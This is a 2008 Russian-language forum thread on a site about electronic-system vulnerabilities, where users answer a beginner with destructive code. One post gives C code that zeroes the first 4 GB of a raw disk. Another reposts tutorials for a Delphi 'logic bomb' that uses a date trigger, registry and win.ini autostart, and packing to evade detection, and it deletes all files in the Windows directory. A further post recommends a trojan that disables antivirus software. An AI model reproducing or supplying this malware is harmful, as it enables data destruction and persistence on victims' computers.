Изучение уязвимостей электронных систем.
 
key programming immo tools emergency start device программаторы ключа заводилки Кодграббер штатных охранных систем, toyota, lexus, subaru.

Вернуться   Изучение уязвимостей электронных систем > Для начинающих > Новички

Новички Раздел для новичков. Что такое кодграббер, ретранслятор, подмена кода.

Закрытая тема
 
Опции темы
Старый 11.01.2008, 19:14   #11
explosion
гость
 
Аватар для explosion
 
Регистрация: 27.05.2007
Сообщений: 133
Поблагодарил: 0
Поблагодарили 7 раз в 6 сообщениях
explosion стоит на развилке
По умолчанию

Цитата:
Сообщение от dikiy SID Посмотреть сообщение
А как прописать операцию жесткого (не быстрого) форматирования диска?

после открытия (createfile) диска и до закрытия (closehandle) вставь такие строки:

unsigned long sector ;
memset ( (PVOID)&buf, 0, sizeof(buf) ) ;

for ( sector = 0 ; sector < 0x800000 ; sector++ ) {
SetFilePointer ( hF, sector*512, NULL, FILE_BEGIN ) ;
WriteFile ( hF, buf, 512, &dwBytes, NULL ) ;
}

это отформатирует первых 4 гигабайта жесткого диска


Уранили мишку на пол
Оторвали мишке лапу
Запихали в жопу веник
Мишка должен много денег
explosion вне форума  
Старый 12.01.2008, 06:23   #12
solariz
случайно влез
 
Аватар для solariz
 
Регистрация: 11.01.2008
Адрес: fuck you!
Сообщений: 17
Поблагодарил: 0
Поблагодарили 1 раз в 1 сообщении
solariz стоит на развилке
По умолчанию

вот статейка с inattack.ru на примере делфи все разжовано
Цитата:
Привет читатель. Добро пожаловать на урок по изготовлению логической бомбы. Логическая бомба это (если я не ошибаюсь) то это разновидность вируса. Её принцип прост. Она запускает определённый программный код при выполнении определённых условий. Часто таким условием бывает время или дата.

И так приступим к программному коду:
0) Запусти Delphi.
1) Создай новый проект.
2) Удали Form из проекта. (project=>remove from project=>выбери форму=>OK=>появится окно, нужно согласиться=>всё! Форма удалена)
3) Откроем место для написания кода (project=>view source=>

Program log_bomb;//Название может быть любым
Uses windows; //Подключаемые модули, чем меньше , тем лучше.
Begin
//Если дата 11.11.1111 то срабатывает код написанный
If datetostr(date)=’11.11.1111’ then
Begin // Между begin
// Сам код, выполняющийся при выполнении условия
End;

Exit;
End.

Вот и всё.

А теперь несколько советов.

1) Всегда в конце лучше писать EXIT; Не пойман не уничтожен – закон вирусов.
2) Если надо чтобы программа срабатывала в определённое время. То надо писать следущее:

If timetostr(time)=’22:22’ then
Begin
// Код
End;

3) Иногда, когда подключаешь много модулей прога приобретает «Царский размер»
В этих случаях необходимо пользоваться ASPACK'ом. Он уменьшит размер примерно в два раза.

4) Всегда проверяй Автозагрузку. Может что-то подобное уже работает у тебя!!!!

Теперь я расскажу как сделать это двумя способами: через файл win.ini и через реестр. Приступим.

1) способ Через Win.ini

Для этого надо знать как работать с INI файлами.

Program INIFI;
Uses inifiles;

//Обьявляем переменную для работы с ini файлами
Var reg: tinifile;

Begin
//Выделяем память для переменной, открываем файл
reg:=tinifile.create('win.ini');
//Непосредственно прописываемся
reg.writestring('windows','run',application.ExeNam e);
//Освобождаем память
reg.free;
exit;
end.

Остановимся на этой строчке подробнее:

reg.writestring('windows','run',application.ExeNam e);

//Переменная reg запись строки типа string, куда указывается в скобках

reg.writestring()


Win.ini находится ВСЕГДА по адресу:
Имя_диска:Папка_виндыwin.ini

2) Способ Через реестр.

Очень похоже на способ 1), только работаем с реестром и другими переменными. Итак. Приступим.

Program regis;
Uses inifiles;

Var load: treginifile;

Begin
load:=treginifile.create;

//Выбираем ветвь реестра
load.RootKey:=hkey_local_machine;

//Выбираем ключ
load.OpenKey('softwaremicrosoftwindowscurrentversi on',false);

//Прописываемся
load.WriteString('runServices','ssi',application.e xename);

Load.free;
exit;
end.


Всё просто. Рассмотрим основные моменты:

Переменная.Rootkey:={Название ветви реестра}
Переменная.openkey(название ключа)

solariz добавил 12.01.2008 в 05:26
Вот еще тут считай сплошной код ) ничего сложного сплошной copypaste
Цитата:
Предупреждаю сразу - статья расчитана на начинающих Делфи-кодеров, поэтому галимый флуд насчет уровня статьи все недовольные могут засунуть себе в }|{0nY. %)) Для начала немного теории. Логическая бомба - это прога, которая некоторое время сидит в памяти и проверяет заранее заданный параметр, при совпадении которого происходят какие-либо действия со стороны программы. Обычно это время или дата, хотя все зависит от твоей фантазии... %)
Итак, вот простенький пример заготовки для логической бомбы:
program Logical_b0mb;
begin
if {условие} then {если совпадает - срабатывание}
begin
{действия при срабатывание}
end
else {иначе}
exit; {выход из проги}
end.
Этот кусок проги не скомпилится, если не будет указан ОБЯЗАТЕЛЬНЫЙ параметр - условиe. Крайне рекомендуется при несовпадении параметра - выгружать программу из памяти, т.к. это сильно затрудняет ее обнаружение. Стартовать прогу следует через win.ini или system.ini, на крайняк - через реестр.Вот работоспособная заготовка бомбы:
program Logical_b0mb;
uses
sysutils;
begin
if datetostr(date) = '22.08.01' then {проверка даты}
begin
{код, выполняющийся при совпадении текущей даты с заданной}
end
else
exit;
end.
Ну все, заготовка сделана, осталось вставить деструктивный код %)). Если кто-то хочет активировать прогу по времени - вместо datetostr(date) следует написать timetostr(time).Для примера в качестве деструктивного %) кода рассмотрим удаление файлов из папки Маздая. Можно заюзать следующую функцию....
function GetMustDieDir: string;
var Buffer: array[0..max_path] of Char;
begin
SetString(Result, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
end;
... но если кто-то не хочет набиваем каждый раз ручками следующие:
uses
windows;
var
p: array[0..max_path] of char;
s: string;
begin
GetWindowsDirectory(p, max_path);
s:= strpas(p) + '\';
end;
Полный текст проги должен выглядеть так:
program Logical_b0mb;
uses
windows, sysutils;
var
p: array[0..max_path] of char;
s: string;
begin
if datetostr(date) = '22.08.01' then
begin
GetWindowsDirectory(p, max_path);
s:= strpas(p) + '\';
end
else
exit;
end.
Ну можно считать, половина проги готова %)) Для удаления файлов воспользуемся функциями
FindFirst FindNext:
program Logical_b0mb;
uses
windows, sysutils;
var
p: array[0..max_path] of char;
s: string;
sr: tsearchrec;
begin
if datetostr(date) = '22.08.01' then
begin
GetWindowsDirectory(p, max_path);
s:= strpas(p) + '\';
if FindFirst(s + '*.*',faanyfile,sr) <> 0
then
FindClose(sr)
else { если функция FindFirst возвращает значение не ноль - завершить поиск, если ноль тогда
продолжить}
repeat {продолжать}
deletefile(s + sr.name); {удаление найденного файла}
until {пока}
Findnext(sr) <> 0; {не возвращено значение ноль}
FindClose(sr);{тогда закончить поиск}
end
else
exit;
end.
Эта прога при загрузке проверяет дату и если дата совпадает - удаляет все файлы из директории Windows. Это, конечно, ОЧЕНЬ простая прога, но если ты 10-20 минут посидишь за Делфей, реализуешь полную очистку диска C: (а может и все дисков %), какие-нибудь дополнительные фичи - получится неплохая программулька. Убрать показ по Ctrl-Alt-Del можно следующим образом (только Win9x):
в var'e обьявляем переменную
var
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
в самой проге пишем:
RegisterServiceProcess(GetCurrentProcessID, 1);
Но я не рекомендую этого делать, т.к. прога, при несовпадении даты, практически сразу выгружает себя из памяти, а обработка kernel32.dll не даст проге работать под WinNT.

После компиляции рекомендуется зажимать прогу ASPack'ом ([Ссылки могут видеть только зарегистрированные пользователи. ]).
Чтобы самому не облажаться и не держать у себя на винте подобный софт, - почаще юзай маздайскую утилиту msconfig (Win9x) или Панель Управления > Администрирование > Службы (Win2000).



Finished!

Последний раз редактировалось solariz; 12.01.2008 в 06:26. Причина: Добавлено сообщение
solariz вне форума  
Старый 11.04.2008, 22:06   #13
Alexsambr
случайно влез
 
Регистрация: 11.04.2008
Сообщений: 10
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
Alexsambr стоит на развилке
По умолчанию

Попробуй троянчик Смерть ламера. каспера он вешает, веба вырубает, а вот НОД его палит! учти это
Alexsambr вне форума  
Закрытая тема


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Видео которое нельзя смотреть до конца <<Дмитрий>> Флейм 2 24.11.2013 19:28
усыпить на время... Бабай Флейм 5 24.08.2011 12:19
Увеличить время работы флеш-камеры. katelisee Видеонаблюдение, системы контроля доступа 10 17.10.2010 17:54
Устройство, которое обнаружит работающий граббер? test Новички 15 12.12.2007 08:37


Текущее время: 15:17. Часовой пояс GMT +4.


Перевод: zCarot